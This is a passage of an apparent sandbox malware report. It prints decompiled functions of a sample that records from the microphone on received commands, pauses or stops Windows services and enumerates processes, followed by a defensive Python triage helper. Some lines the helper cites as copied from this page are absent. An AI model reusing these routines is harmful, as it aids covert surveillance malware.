                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??1?$basic_string@$G@std@@$G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@V01@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$??4?$basic_string@?substr@?$basic_string@D@1@@V01@$?find@?$basic_string@FileG@1@@ModuleNameSleepV10@V10@0@V10@@
                                  • String ID:
                                  • API String ID: 573486607-0
                                  • Opcode ID: aa66e4f5bf8f0b9d55fb22090a090fc99bfa328d692b576d190f675996a42e8d
                                  • Instruction ID: 745551a8169cf10c7f688d11d93f95233c425957d6d772b9d422287574ec9151
                                  • Opcode Fuzzy Hash: aa66e4f5bf8f0b9d55fb22090a090fc99bfa328d692b576d190f675996a42e8d
                                  • Instruction Fuzzy Hash: 2D11A23160060DDBCB04FBA5DD5AAEE3778EB48304F008439F912A72E1EF785544CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                   			E0040DBD7() {
                                   				char* _t7;
                                   				int _t8;
                                   				char* _t9;
                                   				int _t10;
                                   				char* _t11;
                                   				void* _t33;
                                   				void* _t40;
                                   
                                   				 *0x41b1f8 = 0;
                                   				/* fields 2, 1 and 0 of the received command (E0040180C) are parsed as decimal integers with atoi */
                                   				_t7 = E0040180C(_t33 - 0x10, 0, 2);
                                   				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                   				_t8 = atoi(_t7);
                                   				_t9 = E0040180C(_t33 - 0x10, 0, 1);
                                   				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                   				_t10 = atoi(_t9);
                                   				_t11 = E0040180C(_t33 - 0x10, 0, 0);
                                   				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                   				/* the three integers go to E004010CE, which opens and starts microphone capture (waveInOpen / waveInStart, see the subcall list below) */
                                   				E004010CE(_t40, atoi(_t11), _t10, _t8);
                                   				E004017DD(_t33 - 0x10);
                                   				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                   				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                   				return 0;
                                   			}

                                   Addresses of the decompiled statement lines above, in order: 0x0040dbde 0x0040dbe4 0x0040dbeb 0x0040dbf8 0x0040dc01 0x0040dc08 0x0040dc0f 0x0040dc17 0x0040dc1e 0x0040dc29 0x0040e6a4 0x0040e6ac 0x0040e6b5 0x0040e6c1

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040DBEB
                                  • atoi.MSVCRT ref: 0040DBF8
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040DC08
                                  • atoi.MSVCRT ref: 0040DC0F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DC1E
                                  • atoi.MSVCRT ref: 0040DC25
                                    • Part of subcall function 004010CE: _ftol.MSVCRT ref: 00401134
                                    • Part of subcall function 004010CE: waveInOpen.WINMM(0041B198,000000FF,0041B218,0040122D,00000000,00030008), ref: 0040115E
                                    • Part of subcall function 004010CE: waveInStart.WINMM ref: 00401177
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@wave$OpenStart_ftol
                                  • String ID:
                                  • API String ID: 463581448-0
                                  • Opcode ID: e8abcc86fd1f763814c7dcc41e9978dcc5a8fc80e57baa885fa6e4d5f9deb451
                                  • Instruction ID: c3a8f3133f02346e86bcb6311be1634d36dcbe797283f91724418690e0411b93
                                  • Opcode Fuzzy Hash: e8abcc86fd1f763814c7dcc41e9978dcc5a8fc80e57baa885fa6e4d5f9deb451
                                  • Instruction Fuzzy Hash: 1D01FF72E00218DFDB04BBF1EC599ED7764EB90356B00483EE512E71E1EEB85904CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                   			E00411859(void* _a4) {
                                   				struct _SERVICE_STATUS _v32;
                                   				short* _t6;
                                   				signed int _t14;
                                   				void* _t17;
                                   				void* _t18;
                                   
                                   				_t14 = 0;
                                   				/* 0x40 == SERVICE_PAUSE_CONTINUE (winsvc.h); the same mask is passed for the SCM handle and for the service handle */
                                   				_t6 = OpenSCManagerW(0, 0, 0x40);
                                   				_t18 = _t6;
                                   				/* c_str() of the caller's std::wstring service name; the decompiler does not track its eax result, which is why _t6 reappears below */
                                   				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                   				_t17 = OpenServiceW(_t18, _t6, 0x40);
                                   				if(_t17 != 0) {
                                   					/* 2 == SERVICE_CONTROL_PAUSE; _t14 becomes 1 only if the service accepted the control */
                                   					_t14 = 0 | ControlService(_t17, 2,  &_v32) != 0x00000000;
                                   					CloseServiceHandle(_t18);
                                   					CloseServiceHandle(_t17);
                                   				} else {
                                   					CloseServiceHandle(_t18);
                                   				}
                                   				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                   				return _t14;
                                   			}

                                   Addresses of the decompiled statement lines above, in order: 0x00411862 0x00411868 0x00411873 0x00411875 0x00411883 0x00411887 0x004118a8 0x004118ab 0x004118ae 0x00411889 0x0041188a 0x0041188a 0x004118b3 0x004118bf

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,004111F9), ref: 00411868
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,004111F9), ref: 00411875
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004111F9), ref: 0041187D
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 0041188A
                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,004111F9), ref: 00411899
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AB
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004111F9), ref: 004118B3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                  • Instruction ID: 456a524f7c11b696f934a25de41654fa22df35ab19f263cd8204020f404e56b2
                                  • Opcode Fuzzy Hash: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                  • Instruction Fuzzy Hash: 39F04471510518EFD3107FB4AC89EFF3F6CDF89790B448025FA0692150D7749D468AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                   			E004118C0(void* _a4) {
                                   				struct _SERVICE_STATUS _v32;
                                   				short* _t6;
                                   				signed int _t14;
                                   				void* _t17;
                                   				void* _t18;
                                   
                                   				_t14 = 0;
                                   				/* 0x40 == SERVICE_PAUSE_CONTINUE (winsvc.h), as in E00411859 */
                                   				_t6 = OpenSCManagerW(0, 0, 0x40);
                                   				_t18 = _t6;
                                   				/* c_str() of the caller's std::wstring service name; its eax result is what OpenServiceW receives as lpServiceName */
                                   				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                   				_t17 = OpenServiceW(_t18, _t6, 0x40);
                                   				if(_t17 != 0) {
                                   					/* 3 == SERVICE_CONTROL_CONTINUE; this is the resume counterpart of E00411859 */
                                   					_t14 = 0 | ControlService(_t17, 3,  &_v32) != 0x00000000;
                                   					CloseServiceHandle(_t18);
                                   					CloseServiceHandle(_t17);
                                   				} else {
                                   					CloseServiceHandle(_t18);
                                   				}
                                   				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                   				return _t14;
                                   			}

                                   Addresses of the decompiled statement lines above, in order: 0x004118c9 0x004118cf 0x004118da 0x004118dc 0x004118ea 0x004118ee 0x0041190f 0x00411912 0x00411915 0x004118f0 0x004118f1 0x004118f1 0x0041191a 0x00411926

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,00411168), ref: 004118CF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,00411168), ref: 004118DC
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411168), ref: 004118E4
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 004118F1
                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,00411168), ref: 00411900
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411912
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411915
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411168), ref: 0041191A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                  • Instruction ID: 16193dc10f2cd34b32417e23f1564050492aa2af447f1f1bdc9e6cf5e8b33254
                                  • Opcode Fuzzy Hash: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                  • Instruction Fuzzy Hash: D7F04471510518EFD7106FB4EC88DEF3F6CDF89750B444025FA0692150DB749E458AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%
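The per-function "APIs" listings on this page (the keyboard-hook removal at 00405D3D, the microphone capture reached through E004010CE, the three ControlService wrappers at 00411899, 00411900 and 004117A0, the SendInput loop) are where the flagged behaviours are actually visible, but they are buried among hundreds of std::basic_string calls. The following is an added triage helper for this page, not Joe Sandbox code and not code from the sample: it parses listing lines in the exact form shown above, decodes the second ControlService argument with the winsvc.h control codes, and groups call sites by behaviour. The BEHAVIOURS table is a lookup constructed for this example rather than a Joe Sandbox signature, and SAMPLE is constructed from lines copied off this page.

```python
"""Triage helper for the per-function "APIs" listings in this report.

Added example for this page; it is not Joe Sandbox code and not code from
the analysed sample. It parses listing lines of the forms

    • API.MODULE(arg,arg,...), ref: ADDRESS
    • API.MODULE ref: ADDRESS
    • Part of subcall function ADDR: API.MODULE(...), ref: ADDRESS

and maps the raw Win32 calls to the behaviours the report flags for this
sample (keyboard hook removal, microphone capture, service control,
synthetic input). BEHAVIOURS is a lookup table constructed for this example,
not a Joe Sandbox signature; SAMPLE is constructed from lines copied off
this page.
"""
import re
from collections import Counter

SAMPLE = """\
• CloseHandle.KERNEL32(00000000), ref: 00405D2B
• UnhookWindowsHookEx.USER32(00000000), ref: 00405D3D
• SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041046B
• ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040DBEB
• atoi.MSVCRT ref: 0040DBF8
  • Part of subcall function 004010CE: waveInOpen.WINMM(0041B198,000000FF,0041B218,0040122D,00000000,00030008), ref: 0040115E
  • Part of subcall function 004010CE: waveInStart.WINMM ref: 00401177
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,004111F9), ref: 00411868
• OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004111F9), ref: 0041187D
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,004111F9), ref: 00411899
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,00411168), ref: 00411900
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,00411280), ref: 004117A0
"""

API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<subfn>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[^\s(]+)\.(?P<module>[A-Z0-9]+)"   # name.MODULE (name may be a mangled C++ symbol)
    r"(?:\((?P<args>[^)]*)\),?)?"                # optional "(args)," part
    r"\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Win32 calls that carry the behaviours flagged for this sample (constructed table).
BEHAVIOURS = {
    "SetWindowsHookExA": "keyboard hook", "SetWindowsHookExW": "keyboard hook",
    "UnhookWindowsHookEx": "keyboard hook",
    "waveInOpen": "microphone capture", "waveInStart": "microphone capture",
    "SendInput": "synthetic input",
    "OpenSCManagerW": "service control", "OpenServiceW": "service control",
    "ControlService": "service control",
}

# dwControl values accepted by ControlService (winsvc.h).
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                   3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}


def arg_value(token):
    """Decode one argument token: an 8-hex-digit immediate becomes an int; '?' (unknown) becomes None."""
    return int(token, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", token) else None


def parse_api_lines(text):
    """Return one dict per recognised listing line; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m["args"]
        entries.append({
            "api": m["api"],
            "module": m["module"],
            "args": [a.strip() for a in raw.split(",")] if raw else [],
            "ref": int(m["ref"], 16),
            "subfn": int(m["subfn"], 16) if m["subfn"] else None,
        })
    return entries


def service_controls(entries):
    """Map each ControlService call site to the control code it sends (second argument)."""
    result = {}
    for e in entries:
        if e["api"] == "ControlService" and len(e["args"]) >= 2:
            code = arg_value(e["args"][1])
            result[e["ref"]] = SERVICE_CONTROL.get(code, "unknown(%r)" % code)
    return result


def summarize(entries):
    """Count calls per module and group flagged behaviours by the call sites that triggered them."""
    flagged = {}
    for e in entries:
        tag = BEHAVIOURS.get(e["api"])
        if tag:
            flagged.setdefault(tag, []).append(e["ref"])
    return {"per_module": dict(Counter(e["module"] for e in entries)), "flagged": flagged}


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    report = summarize(parsed)
    for tag, refs in report["flagged"].items():
        print("%-20s %s" % (tag, ", ".join("0x%08X" % r for r in refs)))
    for ref, ctl in service_controls(parsed).items():
        print("ControlService @0x%08X sends %s" % (ref, ctl))
```

Run on the listings of a whole report, the "flagged" map gives one line per behaviour with the call sites to inspect, and `service_controls` shows that the three near-identical wrappers differ only in the control code they send (pause, continue, stop) and in the access mask requested (0x40 for pause/continue, 0x20 for stop). Mangled MSVCP60 symbols are parsed but never flagged, which is what removes most of the noise.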

                                  C-Code - Quality: 68%
                                   			E00411760(void* _a4) {
                                   				struct _SERVICE_STATUS _v32;
                                   				short* _t6;
                                   				signed int _t14;
                                   				void* _t17;
                                   				void* _t18;
                                   
                                   				_t14 = 0;
                                   				/* 0x20 == SERVICE_STOP (winsvc.h); again the service right is also passed to OpenSCManagerW */
                                   				_t6 = OpenSCManagerW(0, 0, 0x20);
                                   				_t18 = _t6;
                                   				/* c_str() of the caller's std::wstring service name; its eax result is what OpenServiceW receives as lpServiceName */
                                   				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                   				_t17 = OpenServiceW(_t18, _t6, 0x20);
                                   				if(_t17 != 0) {
                                   					/* 1 == SERVICE_CONTROL_STOP; same wrapper shape as E00411859 and E004118C0 */
                                   					_t14 = 0 | ControlService(_t17, 1,  &_v32) != 0x00000000;
                                   					CloseServiceHandle(_t18);
                                   					CloseServiceHandle(_t17);
                                   				} else {
                                   					CloseServiceHandle(_t18);
                                   				}
                                   				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                   				return _t14;
                                  			}

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,0041B310,?,?,?,?,?,?,?,00411280), ref: 0041176F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000020,?,?,?,?,?,?,?,00411280), ref: 0041177C
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411280), ref: 00411784
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 00411791
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,00411280), ref: 004117A0
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B2
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411280), ref: 004117BA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                  • Instruction ID: b89de82e4dcd107d12e5f2e386de490b738cfb46e6195f9b9e1884d6b0831d1c
                                  • Opcode Fuzzy Hash: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                  • Instruction Fuzzy Hash: 23F0AF71100618EFD3106FB4AC88EFF3F6CEF89390B044025FA06921A0DB648D468AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 43%
                                  			E0040D761(void* __ecx, void* __eflags) {
                                  				void* _t15;
                                  				void* _t20;
                                  				void* _t30;
                                  				void* _t32;
                                  				void* _t34;
                                  				void* _t38;
                                  
                                  				_t38 = __eflags;
                                  				_t20 = __ecx;
                                  				__imp___itoa(GetCurrentProcessId(), _t32 - 0x30, 0xa);
                                  				_t15 = _t32 - 0x60;
                                  				L00414140();
                                  				L00414170();
                                  				E004020C2(0x41be70, 0x4f, _t34);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t15, _t15, E00409EAA(_t38, _t32 - 0x150), _t30, _t32 - 0x30, _t20);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				E004017DD(_t32 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
                                  • GetCurrentProcessId.KERNEL32(?,0000000A), ref: 0040D767
                                  • _itoa.MSVCRT ref: 0040D76E
                                    • Part of subcall function 00409EAA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                    • Part of subcall function 00409EAA: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409ECF
                                    • Part of subcall function 00409EAA: Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                    • Part of subcall function 00409EAA: Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                    • Part of subcall function 00409EAA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?), ref: 0040D78E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040D798
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004F), ref: 0040D7AF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@0@D@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@0@$??0?$basic_string@V10@$Process32$CreateCurrentD@1@@FirstG@1@@G@2@@std@@G@std@@NextProcessSnapshotToolhelp32V01@@_itoa
                                  • String ID:
                                  • API String ID: 1707565870-0
                                  • Opcode ID: 4cae1d544470bc0af079cc07991b023f49fc002eae8bba0a66ae4c0a5993d064
                                  • Instruction ID: 286f1569ef994b2bf272d8202e8d00d479d3e157814ab9f0be6f7aa08cfd563f
                                  • Opcode Fuzzy Hash: 4cae1d544470bc0af079cc07991b023f49fc002eae8bba0a66ae4c0a5993d064
                                  • Instruction Fuzzy Hash: CD01217291021CEBCB05ABE1EC4DDEE7738FBA4306F00443AF506A7091EB745949CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                  			E0041230A(void* __ecx, intOrPtr __edx, void* __eflags) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				char _v44;
                                  				char _v52;
                                  				char _v60;
                                  				char _v68;
                                  				char _v76;
                                  				char _v84;
                                  				void* _t39;
                                  				void* _t41;
                                  				void* _t45;
                                  				void* _t50;
                                  				void* _t54;
                                  				intOrPtr _t56;
                                  				intOrPtr* _t59;
                                  
                                  				_t56 = __edx;
                                  				_t54 = __ecx;
                                  				_t59 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
                                  				 *_t59( &_v44,  &_v60,  &_v76);
                                  				Sleep(0x3e8);
                                  				 *_t59( &_v52,  &_v68,  &_v84);
                                  				_v28 = E004123EE(_t54,  &_v44);
                                  				_v24 = _t56;
                                  				_v20 = E004123EE(_t54,  &_v52);
                                  				_v16 = _t56;
                                  				_t39 = E004123EE(_t54,  &_v60);
                                  				_v32 = _t56;
                                  				_t41 = E004123EE(_t54,  &_v68);
                                  				_v12 = E004123EE(_t54,  &_v76);
                                  				asm("sbb edi, [ebp-0x1c]");
                                  				_v8 = _t56;
                                  				_v32 = _t56;
                                  				_t45 = E004123EE(_t54,  &_v84);
                                  				asm("sbb edi, [ebp-0x4]");
                                  				asm("sbb ecx, [ebp-0xc]");
                                  				asm("adc ecx, [ebp-0x1c]");
                                  				asm("adc ecx, [ebp-0x14]");
                                  				_t50 = E00413F70(_t45 - _v12 - _v20 + _t41 - _t39 + _v28, _t56, 0x64, 0);
                                  				asm("adc edi, [ebp-0x1c]");
                                  				return E00413F00(_t50, _t56, _t45 - _v12 + _t41 - _t39, _t56);
                                  			}

                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0041B320), ref: 0041231D
                                  • GetProcAddress.KERNEL32(00000000), ref: 00412324
                                  • Sleep.KERNEL32(000003E8,?,0041B320), ref: 0041233F
                                  • __aulldiv.LIBCMT ref: 004123E4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProcSleep__aulldiv
                                  • String ID: GetSystemTimes$kernel32.dll
                                  • API String ID: 482274533-1354958348
                                  • Opcode ID: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                  • Instruction ID: 24784d85835a85e8dafa53e59313101cf39276f4ebe332ff0eed9d8e085b34e9
                                  • Opcode Fuzzy Hash: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                  • Instruction Fuzzy Hash: 9231CD72D0021DABCB10EBF5CD85DEFBBBCAE48714F04412AF515F3245D678A6498BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%
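
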